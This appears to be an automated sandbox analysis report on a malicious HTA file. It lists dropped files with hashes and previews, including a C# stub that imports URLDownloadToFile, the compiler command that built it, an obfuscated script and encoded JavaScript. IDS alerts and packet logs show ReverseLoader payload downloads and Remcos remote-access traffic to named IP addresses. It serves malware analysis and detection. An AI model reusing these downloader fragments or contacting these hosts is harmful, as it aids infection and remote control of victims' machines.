                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                          File Type:MSVC .res
                                                                          Category:dropped
                                                                          Size (bytes):652
                                                                          Entropy (8bit):3.0865837290526232
                                                                          Encrypted:false
                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygak7Ynqq2PN5Dlq5J:+RI+ycuZhNuakS2PNnqX
                                                                          MD5:DF5AB67F1F444248323CDA90A60C26E5
                                                                          SHA1:6093786FCDEADEAA3576BC85FE948962A375D288
                                                                          SHA-256:501182E29BC803DD394DCD81F417861FA78D1C3A100906CC2F5A079A2DD3FA5F
                                                                          SHA-512:2B7D89DF83B1632C36786DDDFDB35A97F859A738168241973F67864131A86930F59654B2A4474467A8E3CCFCAD2903182758D1D7DEC422F0BF7F480E9CE5B174
                                                                          Malicious:false
                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.l.a.y.t.q.u.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.l.a.y.t.q.u.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (369)
                                                                          Category:dropped
                                                                          Size (bytes):488
                                                                          Entropy (8bit):3.8770145407613317
                                                                          Encrypted:false
                                                                          SSDEEP:6:V/DsYLDS81zuW5Qivw82FmMGxQXReKJ8SRHy4H6R6mfQMCe+Zf/WIy:V/DTLDfu8KFrXfHuRLZdUfOIy
                                                                          MD5:DF59540F8EDD52A40245B77825076B5C
                                                                          SHA1:101A773A82EEF36B277291D6E450D4984136B176
                                                                          SHA-256:041ED2F3F184DD53C0B2BACBE7E55A05A747A3ED1AA2CAB0E8C93E9AB25A121F
                                                                          SHA-512:790E1139EAB1D895386730743EA05B591820178B76FEC615ACAB192AD8D2C5960703CEBC2C6F4EFC8158020506F35CB69AE6545C649E3D87B74845FBC2EC1990
                                                                          Malicious:false
                                                                          Preview:.using System;.using System.Runtime.InteropServices;..namespace CCsUiONIf.{. public class xZBnUE. {. [DllImport("urLMON.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr Z,string hpHhlNwA,string TRtGJPBte,uint hAUaTPQ,IntPtr cMaQxASYhlK);.. }..}.
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):369
                                                                          Entropy (8bit):5.197682518630787
                                                                          Encrypted:false
                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fhbjJUzxs7+AEszIwkn23fhbv:p37Lvkmb6KRfJJUWZEifx
                                                                          MD5:1C603CF15D015FCEEEFF5788EC4020A4
                                                                          SHA1:1FED64F124305C24B7258E61DDA0B53A6F046CA0
                                                                          SHA-256:8E9D972265DF64351C84AB15BEE2F633F7006D6D9E066C49634A1C0E3A821551
                                                                          SHA-512:4CCE73BABBE7831257A864396F81A2448F8CF7B6BECDD7DC9365F569C25D2F1F4A8719D9124D949E57AE2EEC2B4F0FD00817B621D152B8C71CFC8A45415D2742
                                                                          Malicious:true
                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.0.cs"
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3072
                                                                          Entropy (8bit):2.8553967542707532
                                                                          Encrypted:false
                                                                          SSDEEP:24:etGS1XspeYYLPl788dYckKPJcLWePtkZfwxoTyAFWI+ycuZhNuakS2PNnq:6FDYwPlIqxuWeuJw2+91ulua3Kq
                                                                          MD5:D60C6DB8963E7DED30D93439174D7B7A
                                                                          SHA1:7B33F1602954410A8CD5175A56CFB76C83DF444C
                                                                          SHA-256:7CB34E6646468B250A59AE44518C991CF13028BD78954A9E00E04F3279DC1395
                                                                          SHA-512:A3D151FBC1C4BF133670F0BE093BEC7BCDB7A0FA59EE09AE7C0316BD7BFF525F48CBB70D5C44E2C1401DB9AC02356396C6D0067AF04171C5D14DA320CE5C26F0
                                                                          Malicious:false
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Eg...........!.................#... ...@....... ....................................@.................................d#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......$...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................8.1...................................................... ?.....P ......Q.........W.....Y.....b.....l.....t...Q.....Q...!.Q.....Q.......!.....*.......?.......................................(..........<Module>.bl
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                          Category:modified
                                                                          Size (bytes):867
                                                                          Entropy (8bit):5.312210913600501
                                                                          Encrypted:false
                                                                          SSDEEP:24:KJBqd3ka6KRfJJ1EifUKax5DqBVKVrdFAMBJTH:Cika6CH1EuUK2DcVKdBJj
                                                                          MD5:181A536C4668F770C027CE914B3A8B3B
                                                                          SHA1:87FCFC6BEDB6AF61E0506C450BCD43CD05B7C45E
                                                                          SHA-256:FDBFF1297E28072E142D5F32A8ACFC723132D8C412D650250B21297F5A97F0CB
                                                                          SHA-512:FF81A3DF6DFADDF3A6C3A96315529A23BBECE0F9A1E1080B496D5BA9606283D896B373D67EB12029346C4E3C3AD5ED0CE9AB91A9AE6792BDE7325418A0C3B70A
                                                                          Malicious:false
                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (428), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):166662
                                                                          Entropy (8bit):3.910133536871477
                                                                          Encrypted:false
                                                                          SSDEEP:3072:1VUeFHOtbqwAQvoa4yLdbVUeFHOtbqwAQvoa4yLBVUeFHOtbqwAQvoa4yLM:nH6TA1SdpH6TA1SrH6TA1SM
                                                                          MD5:8BA4E1DCC487BD110B4BCD41E7EE2BA5
                                                                          SHA1:1881AFFF1EB946FDB3EE62133CA43D0BC136AC37
                                                                          SHA-256:4BCB2F9B3A929BD940484218EF0A8C03842480A15BD8A3C4521F5097BD89D581
                                                                          SHA-512:006B7DCFDB7EE27CA1E6AA536C2399321966FFC3B82BC0F86470614345B6E0A2A1ED1D7A143C500669FBA375F9706CFF8ED421502DF7F12F49C3260DC5A8BDE4
                                                                          Malicious:true
                                                                          Preview:....LWuxiobiPGxUrjQ = "GakiGliZHefkizo"..cRGKsPZiZWkLknh = "eALLeLRWNfBnWPL"..fAzetLeUGNNRAmk = "tNJPiQacShejNpd"..LfiUWjKCfCckqxb = "NdZkKzLdPZILUao"..hLLLWLLONiKftAu = "dioLNilRKLvxiRn"..BkkGckkcHRdahpr = "ZPNbpdZiLZmPWLL"....NGPWvKLLPzkuLhZ = "CIKWaWWLfGhZKLh"..cUWxWUWoPcZLtCh = "cpxeBtffPzGbmLG"..cBWOuiGKWumuKGc = "mhLWGWlocLWkWOh"....dlGKbicBcbhmkKu = "KmecmiWxsRQHkLL"..peNNZiHiUpBlxez = "qbqxhiPnKKLWGib"..RbBeWpjBHiKcxPz = "eGPxNTbWjzGiKkp"..LpdPGPKkfLcLPvb = "enzAWPLUopuGiac"..GmzcfGIeKZ
                                                                          File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                          Entropy (8bit):2.1926334528234275
                                                                          TrID:
                                                                            File name:sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta
                                                                            File size:614'246 bytes
                                                                            MD5:5a9dc05899d1a19be638824e5f47b88e
                                                                            SHA1:418e5c2cfc4ba40069bbcbc7373e9ff0b71740f2
                                                                            SHA256:741297ecc59d39296f360b100032cdb120af2eb4ccc5b91f370c0eacb9ee7e25
                                                                            SHA512:0772c9718b79ccff96ed8631ad22d117876c1cb5f1b9313494051e52a63b8f360d8f5fc81beaee296e120a873e99414818bb36db6bf795dfe99d54b3f47f4d7e
                                                                            SSDEEP:192:4dE6COljVneLyZXcFeLyZXcEeLyZXc/Czt4kQ:b6COljV+zO7
                                                                            TLSH:2CD403428C5F11AAB1DC9A9FFB7C542A2593D1EBAA4D1FAAD90FFDC0D8C2204F550C58
                                                                            File Content Preview:<script language=JavaScript>m='%3CScript%20Language%3D%27Javascript%27%3E%0A%3C%21--%20HTML%20Encryption%20provided%20by%20tufat.com%20--%3E%0A%3C%21--%0Adocument.write%28unescape%28%27%253C%2573%2563%2572%2569%2570%2574%2520%256C%2561%256E%2567%2575%2561
                                                                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                            2024-11-26T09:44:13.870876+0100 | 2057635 | ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound | 1 | 104.168.46.26 | 80 | 192.168.2.4 | 49738 | TCP
                                                                            2024-11-26T09:44:13.870876+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 104.168.46.26 | 80 | 192.168.2.4 | 49738 | TCP
                                                                            2024-11-26T09:44:17.456994+0100 | 2858795 | ETPRO MALWARE ReverseLoader Payload Request (GET) M2 | 1 | 192.168.2.4 | 49730 | 104.168.46.26 | 80 | TCP
                                                                            2024-11-26T09:44:29.901520+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 193.30.119.205 | 443 | 192.168.2.4 | 49731 | TCP
                                                                            2024-11-26T09:44:46.955074+0100 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 104.168.46.26 | 80 | 192.168.2.4 | 49738 | TCP
                                                                            2024-11-26T09:44:46.955074+0100 | 2020425 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 | 1 | 104.168.46.26 | 80 | 192.168.2.4 | 49738 | TCP
                                                                            2024-11-26T09:44:58.938984+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49739 | 192.169.69.26 | 14645 | TCP
                                                                            2024-11-26T09:45:10.456136+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49740 | 192.169.69.26 | 14645 | TCP
                                                                            2024-11-26T09:45:22.004452+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49743 | 192.169.69.26 | 14645 | TCP
                                                                            2024-11-26T09:45:33.642369+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49769 | 192.169.69.26 | 14645 | TCP
                                                                            2024-11-26T09:45:45.143923+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49795 | 192.169.69.26 | 14645 | TCP
                                                                            2024-11-26T09:45:56.640094+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49821 | 192.169.69.26 | 14645 | TCP
                                                                            2024-11-26T09:46:08.570874+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49850 | 192.169.69.26 | 14645 | TCP
                                                                            2024-11-26T09:46:20.192797+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49876 | 192.169.69.26 | 14645 | TCP
                                                                            2024-11-26T09:46:31.772603+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49904 | 192.169.69.26 | 14645 | TCP
                                                                            2024-11-26T09:46:43.329673+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49929 | 192.169.69.26 | 14645 | TCP
                                                                            2024-11-26T09:46:54.967037+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49955 | 192.169.69.26 | 14645 | TCP
                                                                            2024-11-26T09:47:06.569998+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49980 | 192.169.69.26 | 14645 | TCP
                                                                            2024-11-26T09:47:18.496446+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50007 | 192.169.69.26 | 14645 | TCP
                                                                            2024-11-26T09:47:30.019357+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50018 | 192.169.69.26 | 14645 | TCP
                                                                            2024-11-26T09:47:41.573419+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50019 | 192.169.69.26 | 14645 | TCP
                                                                            2024-11-26T09:47:53.017292+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50020 | 192.169.69.26 | 14645 | TCP
                                                                            2024-11-26T09:48:04.494276+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50021 | 192.169.69.26 | 14645 | TCP
                                                                            2024-11-26T09:48:16.066157+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50022 | 192.169.69.26 | 14645 | TCP
                                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                            Nov 26, 2024 09:44:17.730004072 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.738296986 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.738339901 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.738359928 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.738385916 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.859457016 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.859477997 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.859522104 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.859539032 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.864284992 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.864300013 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.864336967 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.864352942 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.869923115 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.869976044 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.870001078 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.870042086 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.878398895 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.878469944 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.878629923 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.878680944 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.886817932 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.886888027 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.886894941 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.886941910 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.895355940 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.895387888 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.895464897 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.895493984 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.903780937 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.903798103 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.903871059 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.903871059 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.912173033 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.912237883 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.912239075 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.912303925 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.920660019 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.920691013 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.920726061 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.920762062 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.926990032 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.927038908 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.927056074 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.927093029 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.933357000 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.933414936 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.933449984 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.933514118 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.939735889 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.939800024 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.939810038 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.939860106 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.946180105 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.946243048 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.946279049 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.946321011 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.952562094 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.952610016 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.952642918 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.952678919 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.958889961 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.958959103 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.959013939 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.959067106 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.965428114 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.965451002 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.965511084 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.965538025 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.060414076 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.060451984 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.060637951 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.060637951 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.063426018 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.063512087 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.063546896 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.063601971 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.069499969 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.069521904 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.069585085 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.075440884 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.075526953 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.075762033 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.081351042 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.081425905 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.081469059 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.081526041 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.087538958 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.087625027 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.087677956 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.087677956 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.092926025 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.093041897 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.093151093 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.098809958 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.098881006 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.098911047 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.098941088 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.104574919 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.104652882 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.104684114 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.104729891 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.110482931 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.110536098 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.110585928 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.110616922 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.116249084 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.116300106 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.116518021 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.116565943 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.121356964 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.121432066 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.121485949 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.121537924 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.126569033 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.126679897 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.126727104 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.126775980 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.131252050 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.131350994 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.131436110 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.136110067 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.136188030 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.136245012 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.136291981 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.141078949 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.141143084 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.141154051 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.141197920 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.146065950 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.146158934 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.146193027 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.146246910 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.151026964 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.151108027 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.151263952 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.151309967 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.156054974 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.156085968 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.156161070 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.160954952 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.161019087 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.161139011 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.161180973 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.166060925 CET8049730104.168.46.26192.168.2.4
